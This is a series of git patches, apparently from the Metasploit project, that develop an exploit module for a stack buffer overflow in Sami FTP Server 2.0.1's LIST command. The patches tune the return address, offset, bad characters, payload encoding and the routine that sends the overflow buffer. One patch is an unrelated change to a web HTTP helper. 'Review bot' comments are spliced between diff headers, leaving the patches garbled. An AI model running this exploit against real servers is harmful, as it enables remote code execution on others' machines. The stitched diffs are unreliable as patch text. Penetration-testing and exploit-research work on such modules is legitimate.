From e9af05a178de461cb42728d2b84169d143aa149c Mon Sep 17 00:00:00 2001
From: Doug P
Date: Fri, 15 Mar 2013 11:35:12 -0400
Subject: [PATCH 01/10] made recommended changes

---
 .../exploits/windows/ftp/sami_ftpd_list.rb | 24 +++++++------------
 1 file changed, 8 insertions(+), 16 deletions(-)

diff --git a/modules/exploits/windows/ftp/sami_ftpd_list.rb b/modules/exploits/windows/ftp/sami_ftpd_list.rb
index 5e407e2c9a..42e246062d 100644
--- a/modules/exploits/windows/ftp/sami_ftpd_list.rb
+++ b/modules/exploits/windows/ftp/sami_ftpd_list.rb
@@ -8,7 +8,7 @@ require 'msf/core'
 class Metasploit4 < Msf::Exploit::Remote
- Rank = AverageRanking
+ Rank = NormalRanking
 include Msf::Exploit::Remote::Ftp
@@ -31,43 +31,35 @@ class Metasploit4 < Msf::Exploit::Remote
 [ 'OSVDB', '90815'],
 [ 'EDB', '24557'],
 ],
- 'DefaultOptions' =>
- {
- 'EXITFUNC' => 'seh',
- 'target' => 0
- },
 'Privileged' => false,
 'Payload' =>
 {
- 'Space' => 900,
- 'BadChars' => "\x00~+&=%\x3a\x22\x0a\x0d\x20\x2f\x5c\x2e\x09",
+ 'Space' => 955,
+ 'BadChars' => "\x00\x0a\x0d\x20\xff",
 'StackAdjustment' => -3500,
 },
 'Targets' =>
 [
 [
- 'Windows XP English SP3',
+ 'Windows Universal',
 {
 'Platform' => 'win',
- 'Ret' => 0x10028283,
+ 'Ret' => 0x10028283, # jmp esp C:\Program Files\PMSystem\Temp\tmp0.dll
 'Offset' => 219,
 },
 ],
 ],
+ 'DefaultTarget' => 0,
 'DisclosureDate' => 'Feb 27 2013'))
 end
 def exploit
- connect
+ connect_login
- print_status("Trying target #{target.name}...")
-
- buf = rand_text_english(target['Offset'], payload_badchars)
+ buf = rand_text(target['Offset'], payload_badchars)
 buf << [ target['Ret'] ].pack('V')
 buf << payload.encoded
- send_cmd( ['USER', datastore['FTPUSER']] , false )
- send_cmd( ['PASS', datastore['FTPPASS']], false )
 send_cmd( ['LIST', buf], false )
 handler
From 8f4b3d073a9b44f7813844ef6580e5f17987cb17 Mon Sep 17 00:00:00 2001
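Review bot: `send_cmd( ['LIST', buf], false )` keeps spaces inside the parentheses, which the Ruby style guide drops; `send_cmd(['LIST', buf], false)` matches the `.pack('V')` call two lines above it. The new `connect_login` line replaces the hand-rolled USER/PASS sends, so the remaining `send_cmd` is the only raw command left and should follow the same call style. The `exploit` method continues past the hunk; its `disconnect` and closing `end` are outside it.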
From: Doug P
Date: Fri, 15 Mar 2013 14:52:39 -0400
Subject: [PATCH 02/10] Explicitly set EXITFUNC to thread

---
 modules/exploits/windows/ftp/sami_ftpd_list.rb | 4 ++++
 1 file changed, 4 insertions(+)

diff --git a/modules/exploits/windows/ftp/sami_ftpd_list.rb b/modules/exploits/windows/ftp/sami_ftpd_list.rb
index 42e246062d..16c2c48fbd 100644
--- a/modules/exploits/windows/ftp/sami_ftpd_list.rb
+++ b/modules/exploits/windows/ftp/sami_ftpd_list.rb
@@ -32,6 +32,10 @@ class Metasploit4 < Msf::Exploit::Remote
 [ 'EDB', '24557'],
 ],
 'Privileged' => false,
+ 'DefaultOptions' =>
+ {
+ 'EXITFUNC' => 'thread',
+ },
 'Payload' =>
 {
 'Space' => 955,
From 8b5c782b549a184a2934100d6ac61abf61b0facd Mon Sep 17 00:00:00 2001
From: Doug P
Date: Fri, 15 Mar 2013 15:13:52 -0400
Subject: [PATCH 03/10] changed Platform from Windows to win

---
 modules/exploits/windows/ftp/sami_ftpd_list.rb | 5 ++---
 1 file changed, 2 insertions(+), 3 deletions(-)

diff --git a/modules/exploits/windows/ftp/sami_ftpd_list.rb b/modules/exploits/windows/ftp/sami_ftpd_list.rb
index 16c2c48fbd..94fc2cb6f4 100644
--- a/modules/exploits/windows/ftp/sami_ftpd_list.rb
+++ b/modules/exploits/windows/ftp/sami_ftpd_list.rb
@@ -19,7 +19,7 @@ class Metasploit4 < Msf::Exploit::Remote
 A buffer overflow is triggered when a long LIST
 command is sent to the server and the user views the Log tab.
 },
- 'Platform' => 'Windows',
+ 'Platform' => 'win',
 'Author' =>
 [
 'superkojiman', # Original exploit
@@ -34,7 +34,7 @@ class Metasploit4 < Msf::Exploit::Remote
 'Privileged' => false,
 'DefaultOptions' =>
 {
- 'EXITFUNC' => 'thread',
+ 'EXITFUNC' => 'thread',
 },
 'Payload' =>
 {
@@ -47,7 +47,6 @@ class Metasploit4 < Msf::Exploit::Remote
 [
 'Windows Universal',
 {
- 'Platform' => 'win',
 'Ret' => 0x10028283, # jmp esp C:\Program Files\PMSystem\Temp\tmp0.dll
 'Offset' => 219,
 },
From a96283029e7491fd3c5f347029526192c4ee4ae2 Mon Sep 17 00:00:00 2001
From: Doug P
Date: Fri, 15 Mar 2013 16:08:43 -0400
Subject: [PATCH 04/10] made payload size a little smaller

---
 modules/exploits/windows/ftp/sami_ftpd_list.rb | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/modules/exploits/windows/ftp/sami_ftpd_list.rb b/modules/exploits/windows/ftp/sami_ftpd_list.rb
index 94fc2cb6f4..056e773795 100644
--- a/modules/exploits/windows/ftp/sami_ftpd_list.rb
+++ b/modules/exploits/windows/ftp/sami_ftpd_list.rb
@@ -38,7 +38,7 @@ class Metasploit4 < Msf::Exploit::Remote
 },
 'Payload' =>
 {
- 'Space' => 955,
+ 'Space' => 900,
 'BadChars' => "\x00\x0a\x0d\x20\xff",
 'StackAdjustment' => -3500,
 },
From 3d92d6e9778e66ce159acf9678aae98dc83dff14 Mon Sep 17 00:00:00 2001
From: Doug P
Date: Fri, 15 Mar 2013 16:48:53 -0400
Subject: [PATCH 05/10] removed the handler call

---
 modules/exploits/windows/ftp/sami_ftpd_list.rb | 3 ---
 1 file changed, 3 deletions(-)

diff --git a/modules/exploits/windows/ftp/sami_ftpd_list.rb b/modules/exploits/windows/ftp/sami_ftpd_list.rb
index 056e773795..5f501c96e2 100644
--- a/modules/exploits/windows/ftp/sami_ftpd_list.rb
+++ b/modules/exploits/windows/ftp/sami_ftpd_list.rb
@@ -64,9 +64,6 @@ class Metasploit4 < Msf::Exploit::Remote
 buf << payload.encoded
 send_cmd( ['LIST', buf], false )
-
- handler
 disconnect
 end
-
 end
From fb90a1b497204a8ff1bd29b185ac7ff738654f09 Mon Sep 17 00:00:00 2001
From: dougsko
Date: Mon, 18 Mar 2013 16:18:04 -0300
Subject: [PATCH 06/10] Uses IP address length in offset calculation

---
 modules/exploits/windows/ftp/sami_ftpd_list.rb | 14 ++++++++++----
 1 file changed, 10 insertions(+), 4 deletions(-)

diff --git a/modules/exploits/windows/ftp/sami_ftpd_list.rb b/modules/exploits/windows/ftp/sami_ftpd_list.rb
index 5f501c96e2..52b8d9f12f 100644
--- a/modules/exploits/windows/ftp/sami_ftpd_list.rb
+++ b/modules/exploits/windows/ftp/sami_ftpd_list.rb
@@ -17,7 +17,7 @@ class Metasploit4 < Msf::Exploit::Remote
 'Name' => 'Sami FTP Server 2.0.1 LIST Command Buffer Overflow',
 'Description' => %q{
 A buffer overflow is triggered when a long LIST
- command is sent to the server and the user views the Log tab.
+ command is sent to the server while the user is viewing the Logs tab.
 },
 'Platform' => 'win',
 'Author' =>
@@ -48,18 +48,24 @@ class Metasploit4 < Msf::Exploit::Remote
 'Windows Universal',
 {
 'Ret' => 0x10028283, # jmp esp C:\Program Files\PMSystem\Temp\tmp0.dll
- 'Offset' => 219,
+ 'Offset' => 225,
 },
 ],
 ],
 'DefaultTarget' => 0,
 'DisclosureDate' => 'Feb 27 2013'))
+ register_options(
+ [
+ OptString.new('IPADDR', [true, 'Attacker\'s IP address'])
+ ], self.class)
 end
 def exploit
 connect_login
-
- buf = rand_text(target['Offset'], payload_badchars)
+ sleep 1
+
+ ip_length = datastore['IPADDR'].length - 3
+ buf = rand_text_alphanumeric(target['Offset'] - ip_length)
 buf << [ target['Ret'] ].pack('V')
 buf << payload.encoded
From ad39a5cdc39036cc90e66109b55dcb81fb1c3dca Mon Sep 17 00:00:00 2001
From: Tasos Laskos
Date: Tue, 19 Mar 2013 17:18:44 +0200
Subject: [PATCH 07/10] Auxiliary::Web::HTTP#_request: elog => print_error [SEERM #7815]

Switched form elog to print_error to make reporting bugs easier on users.
---
 lib/msf/core/auxiliary/web/http.rb | 14 +++++++-------
 1 file changed, 7 insertions(+), 7 deletions(-)

diff --git a/lib/msf/core/auxiliary/web/http.rb b/lib/msf/core/auxiliary/web/http.rb
index 789c8233c8..0c5eca0ca9 100644
--- a/lib/msf/core/auxiliary/web/http.rb
+++ b/lib/msf/core/auxiliary/web/http.rb
@@ -252,11 +252,6 @@ class Auxiliary::Web::HTTP
 private
- def print_error( message )
- return if !@parent
- @parent.print_error message
- end
-
 def call_after_run_blocks
 while block = @after_run_blocks.pop
 block.call
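Review bot: `sleep 1` after `connect_login` and the `- 3` in `ip_length = datastore['IPADDR'].length - 3` are unexplained magic values in the new exploit body; each needs a why-comment, e.g. `# TODO(review): document why a one-second pause is needed after login` and a comment stating what the three subtracted characters account for, because a later maintainer cannot recover either from the code. The option description `'Attacker\'s IP address'` escapes an apostrophe that double quotes would avoid: `"Attacker's IP address"`. The `exploit` method continues past the hunk; the LIST send and `disconnect` are outside it.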
@@ -318,10 +313,15 @@ class Auxiliary::Web::HTTP
 # This is bad but we can't anticipate the gazilion different types of network
 # i/o errors between Rex and Errno.
 rescue => e
- elog e.to_s
- e.backtrace.each { |l| elog l }
+ print_error e.to_s
+ e.backtrace.each { |l| print_error l }
 Response.empty
 end
+
+ def print_error( message )
+ return if !@parent
+ @parent.print_error message
+ end
+
 end
 end
From e2a9245b086778963a8be7b0ee36a87e8e74de25 Mon Sep 17 00:00:00 2001
From: dougsko
Date: Tue, 19 Mar 2013 13:20:23 -0300
Subject: [PATCH 08/10] Changed target to Windows XP

---
 modules/exploits/windows/ftp/sami_ftpd_list.rb | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/modules/exploits/windows/ftp/sami_ftpd_list.rb b/modules/exploits/windows/ftp/sami_ftpd_list.rb
index 52b8d9f12f..490fa56202 100644
--- a/modules/exploits/windows/ftp/sami_ftpd_list.rb
+++ b/modules/exploits/windows/ftp/sami_ftpd_list.rb
@@ -45,7 +45,7 @@ class Metasploit4 < Msf::Exploit::Remote
 'Targets' =>
 [
 [
- 'Windows Universal',
+ 'Windows XP',
 {
 'Ret' => 0x10028283, # jmp esp C:\Program Files\PMSystem\Temp\tmp0.dll
 'Offset' => 225,
From b19c51aa818e6ae9b3db6885281b763f52e0c53f Mon Sep 17 00:00:00 2001
From: jvazquez-r7
Date: Tue, 19 Mar 2013 19:04:14 +0100
Subject: [PATCH 09/10] cleanup for sami_ftpd_list

---
 .../exploits/windows/ftp/sami_ftpd_list.rb | 52 ++++++++++---------
 1 file changed, 28 insertions(+), 24 deletions(-)

diff --git a/modules/exploits/windows/ftp/sami_ftpd_list.rb b/modules/exploits/windows/ftp/sami_ftpd_list.rb
index 490fa56202..a72fdc22d8 100644
--- a/modules/exploits/windows/ftp/sami_ftpd_list.rb
+++ b/modules/exploits/windows/ftp/sami_ftpd_list.rb
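Review bot: Replacing `elog` with `print_error` in the rescue of `_request` removes the failure and its backtrace from the framework log entirely, and the relocated wrapper starts with `return if !@parent`, so when no parent is set these errors now leave no trace anywhere. Keeping the log write alongside the console output, `elog e.to_s` before `print_error e.to_s`, preserves a persistent record for the bug reports the commit message wants to make easier. The guard itself reads more idiomatically as `return unless @parent`, and the `def print_error( message )` signature keeps spaces inside the parentheses that the rest of the file's style would drop. The rescued method `_request` starts outside the hunk.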
@@ -8,16 +8,21 @@ require 'msf/core'
 class Metasploit4 < Msf::Exploit::Remote
- Rank = NormalRanking
+ Rank = AverageRanking
 include Msf::Exploit::Remote::Ftp
 def initialize(info = {})
 super(update_info(info,
- 'Name' => 'Sami FTP Server 2.0.1 LIST Command Buffer Overflow',
+ 'Name' => 'Sami FTP Server LIST Command Buffer Overflow',
 'Description' => %q{
- A buffer overflow is triggered when a long LIST
- command is sent to the server while the user is viewing the Logs tab.
+ This module exploits a stack based buffer overflow on Sami FTP Server 2.0.1.
+ The vulnerability exists in the processing of LIST commands. In order to trigger
+ the vulnerability, the "Log" tab must be viewed in the Sami FTP Server managing
+ application, in the target machine. On the other hand, the source IP address used
+ to connect with the FTP Server is needed. If the user can't provide it, the module
+ will try to resolve it. This module has been tested successfully on Sami FTP Server
+ 2.0.1 over Windows XP SP3.
 },
 'Platform' => 'win',
 'Author' =>
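Review bot: The new Description text reads awkwardly in two places: "On the other hand, the source IP address used to connect with the FTP Server is needed" signals a contrast that is not there, and "in the target machine" should be "on the target machine". Suggested wording for that sentence: `In addition, the module needs the source IP address used to connect to the FTP server; if the user does not provide it, the module tries to resolve it.` "stack based" is conventionally hyphenated as "stack-based". The `initialize` method this description belongs to continues past the hunk.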
@@ -29,47 +34,46 @@ class Metasploit4 < Msf::Exploit::Remote
 'References' =>
 [
 [ 'OSVDB', '90815'],
- [ 'EDB', '24557'],
+ [ 'EDB', '24557']
 ],
 'Privileged' => false,
- 'DefaultOptions' =>
- {
- 'EXITFUNC' => 'thread',
- },
 'Payload' =>
 {
- 'Space' => 900,
- 'BadChars' => "\x00\x0a\x0d\x20\xff",
- 'StackAdjustment' => -3500,
+ 'Space' => 1500,
+ 'DisableNops' => true,
+ 'BadChars' => "\x00\x0a\x0d\x20\x5c",
+ 'PrependEncoder' => "\x81\xc4\x54\xf2\xff\xff" # Stack adjustment # add esp, -3500
 },
 'Targets' =>
 [
- [
- 'Windows XP',
+ [ 'Sami FTP Server 2.0.1 / Windows XP SP3',
 {
- 'Ret' => 0x10028283, # jmp esp C:\Program Files\PMSystem\Temp\tmp0.dll
- 'Offset' => 225,
- },
+ 'Ret' => 0x10028283, # jmp esp from C:\Program Files\PMSystem\Temp\tmp0.dll
+ 'Offset' => 228
+ }
 ],
 ],
 'DefaultTarget' => 0,
 'DisclosureDate' => 'Feb 27 2013'))
 register_options(
 [
- OptString.new('IPADDR', [true, 'Attacker\'s IP address'])
+ OptAddress.new('SOURCEIP', [false, 'The local client address'])
 ], self.class)
 end
 def exploit
- connect_login
- sleep 1
-
- ip_length = datastore['IPADDR'].length - 3
- buf = rand_text_alphanumeric(target['Offset'] - ip_length)
+ connect
+ if datastore['SOURCEIP']
+ ip_length = datastore['SOURCEIP'].length
+ else
+ ip_length = Rex::Socket.source_address(rhost).length
+ end
+ buf = rand_text(target['Offset'] - ip_length)
 buf << [ target['Ret'] ].pack('V')
+ buf << rand_text(16)
 buf << payload.encoded
-
 send_cmd( ['LIST', buf], false )
 disconnect
 end
+
 end
From 26dec4eb8f84bb7cbbdb40c39c5a6ce5cffa0ade Mon Sep 17 00:00:00 2001
From: jvazquez-r7
Date: Tue, 19 Mar 2013 21:32:05 +0100
Subject: [PATCH 10/10] last cleanup for sami_ftpd_list

---
 modules/exploits/windows/ftp/sami_ftpd_list.rb | 3 ++-
 1 file changed, 2 insertions(+), 1 deletion(-)

diff --git a/modules/exploits/windows/ftp/sami_ftpd_list.rb b/modules/exploits/windows/ftp/sami_ftpd_list.rb
index a72fdc22d8..62a7abddc2 100644
--- a/modules/exploits/windows/ftp/sami_ftpd_list.rb
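Review bot: The five-line `if datastore['SOURCEIP'] ... else ... end` that assigns `ip_length` in the new `exploit` body is a single expression in idiomatic Ruby, `ip_length = (datastore['SOURCEIP'] || Rex::Socket.source_address(rhost)).length`, which also makes the fallback order readable at a glance. The `PrependEncoder` line carries two comments run together (`# Stack adjustment # add esp, -3500`); one comment, `# add esp, -3500 (stack adjustment)`, says the same thing without the double marker. The `SOURCEIP` description `'The local client address'` would help users more if it said how the fallback works, e.g. `'The client address as seen by the FTP server (resolved automatically if unset)'`. The `initialize` method these option edits sit in starts outside the hunk.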
+++ b/modules/exploits/windows/ftp/sami_ftpd_list.rb
@@ -8,7 +8,7 @@ require 'msf/core'
 class Metasploit4 < Msf::Exploit::Remote
- Rank = AverageRanking
+ Rank = LowRanking
 include Msf::Exploit::Remote::Ftp
@@ -34,6 +34,7 @@ class Metasploit4 < Msf::Exploit::Remote
 'References' =>
 [
 [ 'OSVDB', '90815'],
+ [ 'BID', '58247'],
 [ 'EDB', '24557']
 ],
 'Privileged' => false,